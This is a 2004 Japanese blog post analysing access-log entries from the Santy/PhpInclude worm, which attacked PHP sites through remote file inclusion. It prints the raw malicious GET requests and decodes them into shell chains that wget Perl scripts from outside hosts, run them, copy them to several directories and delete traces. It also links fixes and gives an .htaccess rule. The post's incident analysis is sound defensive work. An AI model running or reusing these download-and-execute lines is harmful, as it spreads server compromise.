2004-12-27
[Security]PHPの脆弱性を狙った攻撃?
追記(04/12/28):Santy.C or Santy.E or PhpInclude.Worm と呼ばれるワームだと判明。include(),require()の不適切な使用による脆弱性を突きます。脆弱性の詳細と対処法はこちら。includeする前にチェックすればOKです。
追記(04/12/30):allow_url_fopen = Off で対処できる模様。*1
追記(05/01/05):上記では問題があるようです。個人的なメモと備忘録 allow_url_fopen を Off にするという対処の問題点について。対策は個人的なメモと備忘録 PHP サーバに感染するワームについてをご覧下さい。
PukiWikiの対策状況についてはPukiWiki-dev:BugTrack/771。
PHPの脆弱性を狙ったものかなあ。
IPが色々なので、リクエストを送っているのは被害者かも。
oo部は伏字。
oo.oo.ooo.ooo - - [26/Dec/2004:14:07:15 +0900] "GET /index.php?cmd=diff&page=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/tmp/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/spool/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/usr/local/apache/proxy/;cd%20/var/tmp/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/spool/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/usr/local/apache/proxy/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;rm%20-rf%20/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/spool/mail/sess_189f0f0889555397a4de5485dd611111*%20/var/mail/sess_189f0f0889555397a4de5485dd611111*%20/usr/local/apache/proxy/sess_189f0f0889555397a4de5485dd611111* HTTP/1.1" 301 - "-" "LWP::Simple/5.65"
;の後ろで改行し、%20を半角スペースに置換すると、こんな感じ。
cd /tmp; wget midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111; perl sess_189f0f0889555397a4de5485dd611111; wget midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113; perl sess_189f0f0889555397a4de5485dd611113; wget midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112; perl sess_189f0f0889555397a4de5485dd611112; wget midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114; perl sess_189f0f0889555397a4de5485dd611114; rm -rf sess_189f0f0889555397a4de5485dd611113.* sess_189f0f0889555397a4de5485dd611114.* sess_189f0f0889555397a4de5485dd611112.*; cp sess_189f0f0889555397a4de5485dd611111 sess_189f0f0889555397a4de5485dd611113 sess_189f0f0889555397a4de5485dd611114 sess_189f0f0889555397a4de5485dd611112 /var/tmp/; cp sess_189f0f0889555397a4de5485dd611111 sess_189f0f0889555397a4de5485dd611113 sess_189f0f0889555397a4de5485dd611114 sess_189f0f0889555397a4de5485dd611112 /var/spool/mail/; cp sess_189f0f0889555397a4de5485dd611111 sess_189f0f0889555397a4de5485dd611113 sess_189f0f0889555397a4de5485dd611114 sess_189f0f0889555397a4de5485dd611112 /var/mail/; cp sess_189f0f0889555397a4de5485dd611111 sess_189f0f0889555397a4de5485dd611113 sess_189f0f0889555397a4de5485dd611114 sess_189f0f0889555397a4de5485dd611112 /usr/local/apache/proxy/; cd /var/tmp/; perl sess_189f0f0889555397a4de5485dd611111; perl sess_189f0f0889555397a4de5485dd611113; perl sess_189f0f0889555397a4de5485dd611114; perl sess_189f0f0889555397a4de5485dd611112; cd /var/spool/mail/; perl sess_189f0f0889555397a4de5485dd611111; perl sess_189f0f0889555397a4de5485dd611113; perl sess_189f0f0889555397a4de5485dd611114; perl sess_189f0f0889555397a4de5485dd611112; cd /var/mail/; perl sess_189f0f0889555397a4de5485dd611111; perl sess_189f0f0889555397a4de5485dd611113; perl sess_189f0f0889555397a4de5485dd611114; perl sess_189f0f0889555397a4de5485dd611112; cd /usr/local/apache/proxy/; perl sess_189f0f0889555397a4de5485dd611111; perl sess_189f0f0889555397a4de5485dd611113; perl sess_189f0f0889555397a4de5485dd611114; perl sess_189f0f0889555397a4de5485dd611112; rm -rf /tmp/sess_189f0f0889555397a4de5485dd611111* /var/tmp/sess_189f0f0889555397a4de5485dd611111* /var/spool/mail/sess_189f0f0889555397a4de5485dd611111* /var/mail/sess_189f0f0889555397a4de5485dd611111* /usr/local/apache/proxy/sess_189f0f0889555397a4de5485dd611111*
もう一件。
oo.oo.oo.oo - - [26/Dec/2004:10:35:55 +0900] "GET /index.php?cmd=diff&page=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 301 - "-" "LWP::Simple/5.803"
同じように処理するとこんな感じ。こちらは掃除しないみたい。
cd /tmp; wget www.visualcoders.net/spybot.txt; wget www.visualcoders.net/worm1.txt; wget www.visualcoders.net/php.txt; wget www.visualcoders.net/ownz.txt; wget www.visualcoders.net/zone.txt; perl spybot.txt; perl worm1.txt; perl ownz.txt; perl php.txt
以下妄想。
- GIF画像を
openさせるincludeさせる - 任意のコマンドをリモートから実行できるようになる
- Perlスクリプトをダウンロード
- Perlスクリプトを実行
- 次のサーバにリクエストを送る
関係がありそうな情報
- SecurityFocus HOME Mailing List: BugTraq
- vBulletin Community Forum - showthread attack attempt?
- vBulletin Community Forum - Security Warning - How they killed my vb
正直者なので、ひとまず以下を.htaccessかhttpd.confに。効果は気休め程度。
RewriteEngine on RewriteCond %{HTTP_USER_AGENT} ^LWP.* [NC] RewriteRule .* - [F]
素性判明。後者はPerl.Santy.CというWormらしい。
こちらでは PhpInclude.Worm or Santy.e となっている。
続報。